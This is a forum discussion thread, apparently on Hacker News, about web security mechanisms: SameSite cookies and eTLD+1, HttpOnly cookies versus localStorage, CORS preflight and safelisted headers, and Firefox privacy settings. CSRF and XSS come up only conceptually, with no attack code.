> It is good practice to always use the SameSite directive with cookies as this provides protection against CSRF attacks.
Be careful with assuming SameSite fully protects from CSRF attacks. I thought it does, but then I read what "site" actually refers to in the context of same site (eTLD+1).
If the eTLD+1 (i.e. company.com) is not listed on the Public Suffix List, even SameSite=strict cookies for a.company.com will still be sent for requests initiated from b.company.com
I believe originally (back in the early drafts of the spec) the concept of a "site" was significantly stricter (based on the origins matching), but it got watered down which was a real shame. I'm not sure why.
> If "document" is a first-party context, and "request"'s URI's origin is the same as the origin of the URI of the active document in the top-level browsing context of "document", then return "First-Party".
vs. (draft 3)
> A document is considered a "first-party context" if and only if the registerable domain of the origin of its URI is the same as the registerable domain of the first-party origin, and if each of the active documents in its ancestors' browsing contexts' is a first-party context.
> but it got watered down which was a real shame. I'm not sure why.
I think (and this might just be an old wive's tale) it was related to the browser connection limits being per domain, and so subdomains + looser cookie origins was a band aid for it.
Cookies work when JavaScript is disabled or has failed to load (your basic functionality should work without it), localStorage doesn't. So unless we are talking about SPAs cookies are generally the better choice.
The sole reason really is that the contents of a HttpOnly cookie cannot be exfiltrated by an XSS-exploit, while a JWT stored in localStorage could be.
This would probably only make a difference if the JWT either has a long lifetime, or is usable outside of the site's origin.
Other than the security implications of HttpOnly (and what it means for XSS), it's also convenience, and works well for small values you want to send with every request anyway, such as user session ids of logged in users and other forms of access tokens[0]. Your frontend code does not have to keep track of such values itself in localStorage (and maintain things like expiration) and it does not have to manually stuff it into each request itself, and so on.
localStorage and IndexedDB on the other hand are most useful for frontend only stuff that the server doesn't need to ever see, and for large chunks of data that you do not want to send with every request, and app-domain specific caches that would be awkward to implement using regular browser caches or ServiceWorkers.
[0] For example, cloudflare implements their "browser checks" anti-DDOS-protections by setting some token in a cookie so your browser isn't hit with that check page on every navigation (at least in theory, TOR users and a lot of VPN users have different experiences). Since the browser will automatically manage and maintain such a cookie, the actual websites behind cloudflare do not need any changes whatsoever to their code.
Cookies are sent with the first request, so the site can customize the response based on user ID. If the site uses local storage to identify the user , it will first have to send some bootstrap page which loads the id and sends it back. Much more cumbersome.
I think 1 is the only real argument.. 2 seems less and less relevant with HSTS.
I suppose the other thing you can do with cookies is use cookie prefixes. __Host probably makes no sense in the context of localStorage/sessionStorage anyway though, since they're all tied to the exact domain.
Having HttpOnly set only buys you so much, too. Sure, you can't steal the session from an XSS vector but your code can still do AJAX queries as the victim, potentially set up a JavaScript shell that works whilst the tab is open...
Great overview with a minor nit-pick; it's Cross-Origin Resource Sharing rather than Request Sharing. It describes a server's willingness to share its resources across origins. The client's request isn't the thing being shared.
"It is good practice to always use the SameSite directive with cookies as this provides protection against CSRF attacks."
"As an added bonus, many of the mitigations on this page can be applied at the proxy server (CSP, HSTS, HPKP) or network level (better server proxying to remove the need for CORS), and only the CSRF and XSS protections really need to be added to the application."
If I add a line to the localhost-bound forward proxy that the aplication uses so that "SameSite" is added to every cookie, then it appears the second statement is misleading.
As a user, I rely on a (forward) proxy. Much easier for me to focus on the proxy than trying to make sure every application^1 is doing the right things.
Both parties to an HTTP transaction can use proxies to execute mitigations. And as the author states, the ones he is mentioning are only some of the possibilities.
1. Especially ones that we do not compile from source and are distributed by "tech" companies that rely on online advertising as their main source of revenue. We users are not their customers, we are the guinea pigs.
> Note that CORS preflight requests are not made for GET HEAD POST requests with default headers.
I really wish the author included an explanation for this. What are "default headers"? What special header(s) needs to be on the request in order for a preflight request to be made?
For your specific question, this is the relevant section of the above link
----
Apart from the headers automatically set by the user agent (for example, Connection, User-Agent, or the other headers defined in the Fetch spec as a “forbidden header name”), the only headers which are allowed to be manually set are those which the Fetch spec defines as a “CORS-safelisted request-header”, which are:
Accept
Accept-Language
Content-Language
Content-Type (but note the additional requirements below)
As I understand it, the main purpose of CORS is to prevent information from being leaked by domains other than the current one using JavaScript, since the browser will always send those domains' cookies in all requests. In that case, why doesn't JavaScript have a method of sending a request without any cookies? Would it still somehow vulnerable to CSRF attacks? Is there simply no demand for the feature? Are there other issues with the concept that I don't know about? (The main context of this is from an attempt to create a client-side JavaScript application which calls a certain public API, which turned out to be impossible since it did not implement CORS headers.)
I totally agree with you. That said, there are people who disagree with both of us and believe that it is reasonable for people to use IP-address-based authorization schemes--which, for avoidance of doubt, might simply be "I am behind a firewall (but all the IP addresses behind my firewall are public addresses, and so cannot be disallowed for this purpose by IETF CIDR)"--and so keep insisting that you should not be able to use a script on a website to "port scan" behind someone's firewall and attack their other half-protected file servers, computers, and printers. This is then why a mechanism actually does exist to say "send a request without cookies"... but it is only for a GET and, this being the key limitation, the script isn't allowed to see the value of what was returned or even if it succeeded or failed (although I can't for the life of my find any documentation on this right now despite swearing I was just trying to use this last week before realizing the response body limitation). Otherwise, this whole thing always feels like some half-assed attempt at DRM :/.
> The reason access-control-allow-origin cannot be '' when access-control-allow-credentials is set is to prevent developers taking the shortcut of adding a and then forgetting about it altogether - this behaviour forces developers to think about how their API is going to be consumed.
Instead developers take the shortcut of creating middleware that captures the Origin header in the request and mirrors it into the response, effectively creating the same insecure ruleset.
This is good information, and I'd love to see a write up how Firefox, Chrome, Brave and other browsers can be set up to prevent some of this.
For example, Firefox has both first-party isolation mode and now Total Cookie Protection, which isolates cookies and would thus likely prevent CSRF. However, I think first-party isolation causes CORS issues like when trying to pay with Paypal on another retail site.
> which isolates cookies and would thus likely prevent CSRF
CSRF is often done via redirecting you or submitting a form, both of which obviously completely bypass FPI and dFPI (i.e. the cookie part of Total Cookie Protection).
> I'd love to see a write up how Firefox, Chrome, Brave and other browsers can be set up to prevent some of this.
I only use firefox, you'll have to find information elsewhere for other browsers.
CSRF, XSS, Set-Cookie
Need to be fixed server-side, there is little to nothing you can do as the client. CSRF and XSS represent straight-up vulnerabilities in the website. Report to the developer and/or stop using the vulnerable website.
You can achieve the same effect of whitelisting 3rd parties by using an extension such as uBlock Origin or uMatrix (warning: no longer in development) in default-deny mode.
Nobody uses this nowadays. Only semi-related, but you can turn on mandatory revocation checking (security.OCSP.require).
Referrer-Policy
network.http.referer.XOriginPolicy
0=always (default), 1=only if base domains match, 2=only if hosts match
network.http.referer.XOriginTrimmingPolicy
0=send full URI (default), 1=scheme+host+port+path, 2=scheme+host+port
These apply only to cross-origin requests but that's probably where you care about the referer. Note that the website's Referrer-Policy might override these, I haven't tested that.
Trying to demystify CORS in a couple of paragraphs....good luck with that! I think 200 page book would still be too short to demystify it. It's a crazy topic
I never understood the difficulty with CORS. It's dirt simple: don't send requests across domain names. And if you do, make sure you return header(s) from the target resource to specifically allow the origin to request it.
All the difficulty seems to be people trying to do crazy, esoteric things there's no good reason to be doing in the first place.
There's a lot of arcana that you're skipping over. It's easy to get CORS partially working on your development machine only to watch it fail in production or only fail on certain browsers or certain ports. There's silly things that need to happen if your application receives traffic from multiple domains. Our CORS middleware is ~100 LOC.
What?! For responding to OPTIONS requests and setting the right header on responses from your backend?
I don't really see the problems you're citing to be a cause of "complexity in CORS" either, but more not having a proper development setup or similar. CORS is specifically about domains. As long as you set the frontend domain as accepted origin in your responses from the backend (and respond to OPTIONS), you're good to go.
But what does that have to do with CORS? If you're just writing the client-side code (what runs in the browser), then you have no control over 3rd party origins, hence either you can use their API or not. Unless you write your own backend also, and then supporting CORS is trivial.
Why do you need to run that on the client? And even if you do need to run it on the client for some reason, GitHub has APIs that you could use which have an allow-all CORS policy (as all APIs do).
CORS is defending against a particular class of attack, which is indistinguishable from the scenario you outlined: evilexample.com wants to get access to your private repos on GitHub (which can be reached purely through GET requests).
The post I was replying to seemed to be saying that invoking multiple services from the client is "a sign of how ludicrous front end development has gotten."
> Why do you need to run that on the client?
Because it's a good idea (less wasteful) to do that on the client. Rather than wasting bandwidth rerouting it via my own server.
You're correct, it's not a list. A browser will sent an Origin header during the OPTIONS preflight that the server can check and then return back that value in an Access-Control-Allow-Origin response header, or it can return * without any checks if e.g. it's a public API endpoint anyway and expected to be hit by fetch/XHR traffic from all kinds of places.
Non-browser clients (and browser for non-CORS and/or "simple" requests) will not usually send any CORS headers and preflight requests, so you should account for that when building a web API. Non-browser clients can of course just fake any browser header and request they want, so the Access-Control headers are NOT a substitute for real access control/authentication.
Yep, that's correct. Only a single origin is supported. The implementation on the backend server/proxy may use a lookup list, and return the specified origin if that exists in the list. As called out in the post too, * is a valid one (as is null) but is not recommended.
"Note that CORS preflight requests are not made for GET HEAD POST requests with default headers."
What are these "default" headers. I have seen access-control-allow- response headers when making HTTP requests. I do not send unnecessary headers. Perhaps some of the ones I do not send are considered "default".
"Thus CORS is a way of selectively loosening security not of tightening it."
Proxy config I use scrubs all CORS headers. As the author states, CORS is irrelevant outside the browser. I make most HTTP requests outside the ("modern") browser anyway.
"Overall, as the web grows in terms of features and complexity, the attack surface also grows correspondingly large."
Job security for some people, I guess.
Apparently there is no sufficient incentive to simplify things (by subtraction not addition).
As well as a system you can use to evaluate your site: https://observatory.mozilla.org/